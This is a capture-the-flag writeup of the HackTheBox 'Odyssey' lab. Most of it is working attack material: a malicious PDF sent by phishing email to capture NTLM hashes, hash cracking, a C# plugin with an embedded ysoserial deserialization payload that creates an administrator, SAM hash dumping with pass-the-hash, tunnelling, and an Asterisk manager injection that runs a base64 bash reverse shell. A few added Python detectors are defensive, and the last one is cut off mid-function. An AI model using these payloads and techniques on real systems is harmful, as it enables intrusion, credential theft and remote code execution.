Oddsey Writeup

The document details a penetration testing exercise on a Windows machine, revealing open ports and services. It describes exploiting a vulnerability in Adobe Reader to obtain an NTLMv2 hash and successfully cracking the password for the user 'elpenor'. The process concludes with gaining access to the system and retrieving a flag, demonstrating a successful compromise of the target machine.

Uploaded by

cybaxpat

HackTheBox

Odyssey

Inner Orion Arm


ODYSSEY{k4r3Ful_WI7h_pDf_FiL32}
We start by scanning the machine's ports with nmap and find several open ports, most of
which look like those of a Windows host.

❯ nmap 10.13.38.21
Nmap scan report for 10.13.38.21
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
587/tcp open submission
5985/tcp open wsman
28016/tcp open unknown
28083/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
SMB is open, and crackmapexec shows that the machine is called ONLINE and does not belong to
any domain: it is a standalone Windows machine.

❯ crackmapexec smb 10.13.38.21


SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:online) (signing:False) (SMBv1:False)
On the main page, the information section talks about Rust servers and Oxide mods improving
performance, and shows some images.

The first image catches the eye: in the background, besides the running cmd window, there is
a shortcut to Adobe Reader 9, so it may be installed.
A little further down we find a support email, [email protected].

The following article shows a possible way to obtain a request, and with it an NTLMv2 hash,
through a PDF opened in old versions of Adobe Reader and Foxit. Using Bad-PDF we create a
malicious PDF, indicating our host and the interface to listen on.

❯ sudo python2 badpdf.py

______ __ _______ ______ ________


|_ _ \ | ] |_ __ \|_ _ `.|_ __ |
| |_) | ,--. .--.| | ______ | |__) | | | `. \ | |_ \_|
| __'. `'_\ : / /'`' ||______|| ___/ | | | | | _|
_| |__) |// | |,| \__/ | _| |_ _| |_.' /_| |_
|_______/ '-;__/ '.__.;__] |_____| |______.'|_____|
Author : Deepu TV ; Alias DeepZec
=============================================================

Responder detected :/usr/sbin/responder


Please enter Bad-PDF host IP:
10.10.14.10
Please enter output file name:
test.pdf
Please enter the interface name to listen(Default eth0):
tun0
[*] Starting Process.. [*]
Bad PDF test.pdf created
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
[+] Listening for events...
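From the defender's side, the Bad-PDF trick relies on a PDF action (GoToE, GoToR or Launch) whose file target is a UNC path, which makes the reader resolve it over SMB and send NTLM credentials. The following Python scanner is an added example, not part of the original writeup or of Bad-PDF: it flags such actions in uncompressed PDF objects (object streams would have to be inflated first, which it does not do); the sample document and the 192.0.2.10 address are constructed.

```python
import re

# PDF action types that make the reader open an external document or program.
# When their /F target is a UNC path, Windows resolves it over SMB and sends NTLM
# credentials, which is exactly what Responder captures in the writeup above.
REMOTE_ACTIONS = (b"GoToE", b"GoToR", b"Launch")

# "N G obj ... endobj" (only uncompressed objects; object streams are not inflated here)
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/(" + b"|".join(REMOTE_ACTIONS) + rb")\b")
# /F (...) or /UF (...) literal string, honouring backslash escapes inside it
FILESPEC_RE = re.compile(rb"/U?F\s*\(((?:[^()\\]|\\.)*)\)")

# Constructed sample: a benign URI link, a local GoToR, and one GoToE whose target
# is a UNC path on 192.0.2.10 (documentation address, not a real host).
SAMPLE_PDF = b"\n".join([
    rb"%PDF-1.7",
    rb"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj",
    rb"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
    rb"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj",
    rb"4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com) >> >> endobj",
    rb"5 0 obj << /Type /Action /S /GoToE /F (\\\\192.0.2.10\\share\\doc) /D [0 /Fit] /NewWindow true >> endobj",
    rb"6 0 obj << /Type /Action /S /GoToR /F (appendix.pdf) /D [0 /Fit] >> endobj",
    rb"trailer << /Root 1 0 R >>",
    rb"%%EOF",
])


def pdf_string_unescape(raw: bytes) -> str:
    """Undo PDF literal-string escapes (backslash-backslash, backslash-paren, \\n, ...).
    Octal escapes are passed through unchanged, which is enough for spotting UNC paths."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i:i + 1] == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            out += {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(nxt, nxt)
            i += 2
        else:
            out += raw[i:i + 1]
            i += 1
    return out.decode("latin-1")


def unc_host(path: str):
    """Return the host part of a UNC path (two leading backslashes), or None."""
    if path.startswith("\\\\") and len(path) > 2:
        return path[2:].split("\\", 1)[0] or None
    return None


def find_unc_actions(pdf: bytes):
    """Return (object number, action type, target path, host) for every remote
    action whose file target points at a UNC path."""
    hits = []
    for m in OBJ_RE.finditer(pdf):
        objnum, body = int(m.group(1)), m.group(2)
        action = ACTION_RE.search(body)
        if not action:
            continue
        for spec in FILESPEC_RE.finditer(body):
            target = pdf_string_unescape(spec.group(1))
            host = unc_host(target)
            if host:
                hits.append((objnum, action.group(1).decode(), target, host))
    return hits


if __name__ == "__main__":
    for objnum, action, target, host in find_unc_actions(SAMPLE_PDF):
        print(f"object {objnum}: /{action} action targets UNC path {target} (host {host})")
```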

Since we have an email address and SMTP is open, we can send a phishing email to the Invoice
mailbox with the PDF attached, hoping that someone opens it and triggers the request.

❯ swaks --to [email protected] --from [email protected] --header "Subject: Problem on the server" --server 10.13.38.21 --attach test.pdf
=== Trying 10.13.38.21:25...
=== Connected to 10.13.38.21.
<- 220 ONLINE ESMTP
-> EHLO kali
<- 250-ONLINE
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<[email protected]>
<- 250 OK
-> RCPT TO:<[email protected]>
<- 250 OK
-> DATA
<- 354 OK, send.
-> To: [email protected]
-> From: [email protected]
-> Subject: Problem on the server
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> .
<- 250 Queued (1.168 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
After a few seconds we receive an authentication as the user elpenor, which Responder
captures as that user's hash in NTLMv2 format.
[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.13.38.21


[SMB] NTLMv2-SSP Username : ONLINE\elpenor
[SMB] NTLMv2-SSP Hash :
elpenor::ONLINE:1122334455667788:76648058671B85ABBFACBA7C04CB33A7:01010000
The password is weak, and we crack it with john.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash


Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
superman (elpenor)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Checking elpenor's password with crackmapexec, we find that it is valid for both SMB and
WinRM; for WinRM it even returns Pwn3d!, so we can get a shell.

❯ crackmapexec smb 10.13.38.21 -u elpenor -p superman


SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\elpenor:superman

❯ crackmapexec winrm 10.13.38.21 -u elpenor -p superman


SMB 10.13.38.21 5985 ONLINE [*] Windows 10.0 Build 17763
(name:ONLINE) (domain:ONLINE)
HTTP 10.13.38.21 5985 ONLINE [*] http://10.13.38.21:5985/wsman
HTTP 10.13.38.21 5985 ONLINE [+] ONLINE\elpenor:superman (Pwn3d!)
We can simply connect with evil-winrm, get a shell and read the flag

❯ evil-winrm -i 10.13.38.21 -u elpenor -p superman


PS C:\Users\elpenor\Documents> whoami
online\elpenor
PS C:\Users\elpenor\Documents> type ..\Desktop\flag.txt
ODYSSEY{k4r3Ful_WI7h_pDf_FiL32}
PS C:\Users\elpenor\Documents>
Strange quark
ODYSSEY{Ded1CA7eD_rU57_5ERVeR}
Browsing the directories we find one called rustserver, which contains another called oxide,
the mod framework mentioned earlier on the website.
PS C:\rustserver\oxide> dir
Directory: C:\rustserver\oxide
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/14/2021 7:05 AM config
d----- 3/14/2021 7:19 AM data
d----- 3/14/2021 7:05 AM lang
d----- 5/6/2022 2:42 AM logs
d----- 7/24/2021 1:12 PM plugins
-a---- 3/14/2021 7:05 AM 431 oxide.config.json
PS C:\rustserver\oxide>
Interestingly, the plugins directory is writable by BUILTIN\Users, so we could upload our own
plugin written in C#, following the Oxide documentation to create it.
PS C:\rustserver\oxide\plugins> icacls .
. BUILTIN\Users:(OI)(CI)(W)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\rustserver\oxide\plugins>
To take advantage of this we generate, with ysoserial.net, a serialized payload that creates
a user called pwned and adds it to the Administrators group, indicating the BinaryFormatter
formatter and requesting base64 output.
PS C:\CTF\ysoserial> .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o base64 -c "net user pwned password123# /add && net localgroup Administrators pwned /add"
PS C:\CTF\ysoserial>
Based on the example in the Oxide documentation, we write a simple C# plugin that
deserializes our payload with BinaryFormatter when the plugin initialises.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace Oxide.Plugins
{
    [Info("Epic Stuff", "Unknown Author", "0.1.0")]
    [Description("Makes epic stuff happen")]
    class EpicStuff : CovalencePlugin
    {
        // Oxide calls Init() as soon as it has compiled and loaded the plugin
        private void Init()
        {
            // ysoserial.net TypeConfuseDelegateMono gadget, base64-encoded. A verbatim
            // string is used so the wrapped lines can stay as they are:
            // Convert.FromBase64String ignores whitespace inside the input.
            byte[] payload = Convert.FromBase64String(@"AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNp
b249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1
NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNld
GAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0d
XJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAF
Q291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbn
MuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3Jsa
WIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1
iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTe
XN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG
VtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsL
CBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAy
JTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAA
AAGBgAAAE8vYyBuZXQgdXNlciBwd25lZCBwYXNzd29yZDEyMyMgL2FkZCAmJiBuZXQg
bG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyBwd25lZCAvYWRkBgcAAAADY21kBAUAAAA
iU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0
aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRG
VsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphd
GlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhv
bGRlcgkIAAAACQkAAAAJCQAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRp
b25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFy
Z2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdG
VFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxl
Z2F0ZUVudHJ5BgoAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29yb
GliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZ
W49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJza
W9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjN
TYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcn
Npb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNW
M1NjE5MzRlMDg5XV0GCwAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJl
PW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBgwAAABJU3l
zdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG
9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYNAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXN
zBg4AAAAFU3RhcnQJDwAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm
9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05h
bWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzA
QEBAQEAAwgNU3lzdGVtLlR5cGVbXQkOAAAACQwAAAAJDQAAAAYTAAAAPlN5c3RlbS
5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpb
mcpBhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cml
uZywgU3lzdGVtLlN0cmluZykIAAAACgEPAAAACAAAAAkKAAAACQsAAAAKCQwAAAAJD
QAAAAkOAAAACgs=");
            // BinaryFormatter runs the gadget chain while deserializing, so the
            // command executes with the privileges of the Rust server process
            BinaryFormatter formatter = new BinaryFormatter();
            Stream stream = new MemoryStream(payload);
            object obj = formatter.Deserialize(stream);
        }
    }
}
We only have to upload the .cs file to the Oxide plugins directory and wait for it to be
compiled and loaded; evil-winrm's upload command does the transfer.
PS C:\rustserver\oxide\plugins> upload EpicStuff.cs

Info: Uploading EpicStuff.cs to C:\rustserver\oxide\plugins\EpicStuff.cs

Data: 4352 bytes of 4352 bytes copied

Info: Upload successful!


PS C:\rustserver\oxide\plugins>
After a few seconds the plugin is loaded and our payload executes: the user pwned is created
and belongs to the Administrators group.
PS C:\rustserver\oxide\plugins> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount elpenor
Guest pwned sshd
WDAGUtilityAccount
The command completed with one or more errors.
PS C:\rustserver\oxide\plugins> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the
computer/domain
Members
-------------------------------------------------------------------------------
Administrator
pwned
The command completed successfully.
PS C:\rustserver\oxide\plugins>
Since the user is an administrator, crackmapexec returns Pwn3d!, so we can dump the SAM and
see every user's NT hash.

❯ crackmapexec smb 10.13.38.21 -u pwned -p password123#


SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\pwned:password123# (Pwn3d!)

❯ crackmapexec smb 10.13.38.21 -u pwned -p password123# --sam


SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\pwned:password123# (Pwn3d!)
SMB 10.13.38.21 445 ONLINE [*] Dumping SAM hashes
SMB 10.13.38.21 445 ONLINE Administrator:500:aad3b435b51404eeaad3b435b51404ee:c606623dc66bad2c670d402d4a33d2b7:::
SMB 10.13.38.21 445 ONLINE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.13.38.21 445 ONLINE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.13.38.21 445 ONLINE WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b2aee3361c843009143be1a935d8db9b:::
SMB 10.13.38.21 445 ONLINE elpenor:1001:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
SMB 10.13.38.21 445 ONLINE sshd:1002:aad3b435b51404eeaad3b435b51404ee:696df4f224281d855e7716d56acc2bc8:::
SMB 10.13.38.21 445 ONLINE pwned:1003:aad3b435b51404eeaad3b435b51
We connect with evil-winrm passing the Administrator NT hash, get a shell and read the flag.

❯ evil-winrm -i 10.13.38.21 -u Administrator -H c606623dc66bad2c670d402d4a33d2b7


PS C:\Users\Administrator\Documents> whoami
online\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ODYSSEY{Ded1CA7eD_rU57_5ERVeR}
PS C:\Users\Administrator\Documents>
Entanglement
ODYSSEY{THE_tElEPH0Ne_4_New_M4cHINe}
Running ipconfig we notice a second network interface, on which our IPv4 address is
192.168.21.10; there may be more devices on that network.
PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::17
IPv6 Address. . . . . . . . . . . : dead:beef::a04b:6d7c:3355:828d
Link-local IPv6 Address . . . . . : fe80::a04b:6d7c:3355:828d%6
IPv4 Address. . . . . . . . . . . : 10.13.38.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:deb9%6
10.13.38.2
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1521:9a68:91c:f431%4
IPv4 Address. . . . . . . . . . . : 192.168.21.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.21.2
PS C:\Users\Administrator\Documents>
To reach that network from our machine we use ligolo-ng: the agent connects back to our
proxy on port 11601, the port the proxy listens on.
PS C:\Users\Administrator\Documents> upload agent.exe
Info: Uploading agent.exe to C:\Users\Administrator\Documents\agent.exe
Data: 6460072 bytes of 6460072 bytes copied
Info: Upload successful!
PS C:\Users\Administrator\Documents> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert
In the proxy we get a session; we select it and start the tunnel with start.

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0051] Agent joined. name="ONLINE\\Administrator@online"
remote="10.13.38.21:49679"
ligolo-ng » session
? Specify a session : 1 - ONLINE\Administrator@online - 10.13.38.21:49679
[Agent : ONLINE\Administrator@online] » start
INFO[0062] Starting tunnel to ONLINE\Administrator@online
[Agent : ONLINE\Administrator@online] »
We add the 192.168.21.0/24 route through the ligolo interface, and now we can reach every
host on that segment, which we check with a ping.

❯ sudo ip route add 192.168.21.0/24 dev ligolo

❯ ping -c1 -w1 192.168.21.10


PING 192.168.21.10 (192.168.21.10) 56(84) bytes of data.
64 bytes from 192.168.21.10: icmp_seq=1 ttl=64 time=167 ms
--- 192.168.21.10 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 167.279/167.279/167.279/0.000 ms
With ping we find another three live hosts, .11 to .13, which we port-scan with nmap.

❯ nmap 192.168.21.11-13
Nmap scan report for 192.168.21.11
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3000/tcp open ppp
Nmap scan report for 192.168.21.12
PORT STATE SERVICE
3000/tcp open ppp
5039/tcp open unknown
8080/tcp open http-proxy
25000/tcp open icl-twobase1
Nmap scan report for 192.168.21.13
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
Let's start with the web on .12, port 8080, which simply runs Gogs.

We already know that a user called elpenor exists; checking whether he has a Gogs account, it
turns out he does, and he has a public repository.

The repository holds the source code of a Rocket.Chat bot for the chat running on port 3000.
We can also see all of elpenor's public activity, such as his commits.

In one of the commits we find an invitation link through which anyone can register in
Rocket.Chat.
We open the link and register a test user, which gives us access to a Rocket.Chat instance
with a channel called general.
Another interesting thing: in the repository's issues, elpenor asks for a VoIP server to be
created and for its address to be passed to the bot aeolus with the syntax ip <ip address>.
With netsh we redirect all traffic arriving at port 5038, the port the VoIP manager interface
uses, to our host, so that the bot's request reaches our machine.
PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=5038 connectaddress=10.10.14.10 connectport=5038
PS C:\Users\Administrator\Documents>
We send the Windows IP, 192.168.21.10, to the bot aeolus in the chat, and on our attacking
machine we receive the request, which only tries to authenticate.

Since the authentication reaches us, we capture its credentials.

❯ netcat -lvnp 5038


Listening on 0.0.0.0 5038
Connection received on 10.13.38.21
Action: login
Username: aeolus
Secret: P7xJ6y6x
ActionID: __auth_1693366373541__
Port 5038 on .12 is closed, but 5039, the TLS variant of the same interface, is open. We create
a commands.txt file with the same login the bot performed.
Action: login
Username: aeolus
Secret: P7xJ6y6x
Now we connect to port 5039 with openssl s_client, feeding commands.txt on standard input,
and receive Authentication accepted.

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039


Response: Success
Message: Authentication accepted
Event: FullyBooted
Privilege: system,all
Uptime: 4251
LastReload: 4251
Status: Fully Booted
We repeat the process, this time adding a help command.
Action: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: help
Among the available commands is dialplan add extension, which we add to commands.txt to see
the syntax needed to use it.
Action: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: dialplan add extension
In the privileges we find system,all, which is what we need, and the output shows the
arguments the command takes.

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039


Response: Success
Message: Authentication accepted
Event: FullyBooted
Privilege: system,all
Uptime: 4356
LastReload: 4356
Status: Fully Booted
Response: Error
Message: Command output follows
Output: Usage: dialplan add extension <exten>,<priority>,<app> into <context> [replace]
Output:
Output: app can be either:
Output: app-name
Output: app-name(app-data)
Output: app-name,<app-data>
Output:
Output: This command will add the new extension into <context>. If
Output: an extension with the same priority already exists and the
Output: 'replace' option is given we will replace the extension.
Output:
Output: Example: dialplan add extension 6123,1,Dial,IAX/216.207.245.56/6123 into local
Output: Now, you can dial 6123 and talk to Markster :)
We can use the System application; to get a shell we base64-encode a classic bash
reverse-shell one-liner that connects back to .10 on port 4444.

❯ echo 'bash -c "bash -i >& /dev/tcp/192.168.21.10/4444 0>&1"' | base64


YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEwLzQ0NDQgMD4mMSIK
Now we create the extension test in the context pwned, which runs our payload through System,
and then originate a call to that extension.
Action: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: dialplan add extension test,1,system(echo\ YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEwLzQ0NDQgMD4mMSIK|base64\ -d|bash), into pwned replace
Action: command
Command: originate local/test@pwned extension test@pwned
In Windows we redirect the traffic that enters through port 4444 to our host
PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4 listenaddress=192.168.21.10 listenport=4444 connectaddress=10.10.14.10 connectport=4444
PS C:\Users\Administrator\Documents>
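Both portproxy rules above (port 5038 and port 4444) turn the Windows host into a relay towards 10.10.14.10, and such rules survive reboots. The following Python audit is an added example, not part of the original writeup: it parses the output of netsh interface portproxy show all (here a constructed copy of the two rules plus a benign loopback one) and flags rules whose target is outside the host's own networks or that listen on every interface.

```python
import ipaddress

# Constructed output of "netsh interface portproxy show all", mirroring the two rules
# added above (listeners on the Windows pivot, targets on the attacker's 10.10.14.10)
# plus one benign loopback rule.
SAMPLE_NETSH_OUTPUT = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         5038        10.10.14.10     5038
192.168.21.10   4444        10.10.14.10     4444
127.0.0.1       8443        127.0.0.1       443
"""


def parse_portproxy(text: str):
    """Parse the v4tov4 table into rule dicts. The same rules persist in the registry
    under HKLM\\SYSTEM\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp."""
    rules = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            rules.append({
                "listen_addr": ipaddress.ip_address(parts[0]),
                "listen_port": int(parts[1]),
                "connect_addr": ipaddress.ip_address(parts[2]),
                "connect_port": int(parts[3]),
            })
        except ValueError:
            continue  # header or separator row
    return rules


def audit_portproxy(rules, local_networks):
    """Return (rule, reasons) for rules that relay traffic off the host's own networks
    or that listen on every interface; local_networks are the host's subnets."""
    nets = [ipaddress.ip_network(n) for n in local_networks]
    findings = []
    for rule in rules:
        reasons = []
        dst = rule["connect_addr"]
        if not dst.is_loopback and not any(dst in net for net in nets):
            reasons.append(f"forwards to {dst}, which is on none of the host's networks")
        if rule["listen_addr"].is_unspecified:
            reasons.append("listens on every interface (0.0.0.0)")
        if reasons:
            findings.append((rule, reasons))
    return findings


if __name__ == "__main__":
    # On a live host, replace SAMPLE_NETSH_OUTPUT with the real command output.
    host_nets = ["10.13.38.0/24", "192.168.21.0/24"]  # taken from the ipconfig above
    for rule, reasons in audit_portproxy(parse_portproxy(SAMPLE_NETSH_OUTPUT), host_nets):
        print(f"{rule['listen_addr']}:{rule['listen_port']} -> "
              f"{rule['connect_addr']}:{rule['connect_port']}: " + "; ".join(reasons))
```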
Finally we send the commands to the manager interface; when System runs our payload we receive
a shell as the asterisk user on .12, where we can read the flag.

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039

❯ netcat -lvnp 4444


Listening on 0.0.0.0 4444
Connection received on 10.13.38.21
asterisk@odyssey:~$ id
uid=112(asterisk) gid=117(asterisk) groups=117(asterisk)
asterisk@odyssey:~$ hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
asterisk@odyssey:~$ cat /opt/flag.txt
ODYSSEY{THE_tElEPH0Ne_4_New_M4cHINe}
asterisk@odyssey:~$
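The whole chain on .12 runs over the Asterisk Manager Interface: key/value messages separated by blank lines, a login with a reusable Secret, and a CLI command that adds an extension whose application hands its argument to a shell. The following Python code is an added example, not part of the original writeup or of Asterisk: it parses an AMI session in the same shape as commands.txt (a constructed one, with a made-up secret and a harmless id instead of the reverse shell) and flags the messages that inject shell execution, masking the secret for logging.

```python
import re

# Dialplan applications that hand their argument to a shell.
SHELL_APPS = {"system", "trysystem"}

# CLI syntax shown by the server above:
#   dialplan add extension <exten>,<priority>,<app> into <context> [replace]
ADD_EXT_RE = re.compile(
    r"^dialplan\s+add\s+extension\s+(?P<exten>[^,]+),(?P<prio>[^,]+),"
    r"(?P<app>.+?)\s+into\s+(?P<context>\S+)",
    re.I,
)

# Constructed AMI session in the same shape as commands.txt; the secret is made up
# and the payload is a harmless "id" instead of the reverse shell used above.
SAMPLE_SESSION = """\
Action: login
Username: aeolus
Secret: example-secret

Action: command
Command: core show channels

Action: command
Command: dialplan add extension test,1,System(id) into pwned replace

Action: command
Command: originate local/test@pwned extension test@pwned

Action: originate
Channel: Local/100@default
Application: System
Data: id
"""


def parse_ami(stream: str):
    """Split an AMI stream into messages: blocks of 'Key: value' lines separated by blank lines."""
    messages, current = [], {}
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            if current:
                messages.append(current)
                current = {}
            continue
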